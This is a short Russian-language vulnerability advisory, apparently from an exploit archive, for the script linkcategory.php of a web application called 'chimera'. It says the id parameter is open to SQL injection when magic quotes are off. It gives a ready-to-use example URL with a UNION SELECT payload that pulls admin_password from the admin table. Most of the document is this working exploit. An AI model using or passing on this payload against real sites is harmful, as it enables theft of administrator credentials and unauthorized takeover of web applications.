Описание:
Уязвимость скрипт:
linkcategory.php
Уязвимость находится в $id и позволяет выполнить SQL-инъекцию для
получения пароля администратора.
Обязательно: gpc_magic_quotes = off
Пример:
http://host/chimera/linkcategory.php?id=9999'%20union%20select%20admin_password%20from%20admin/*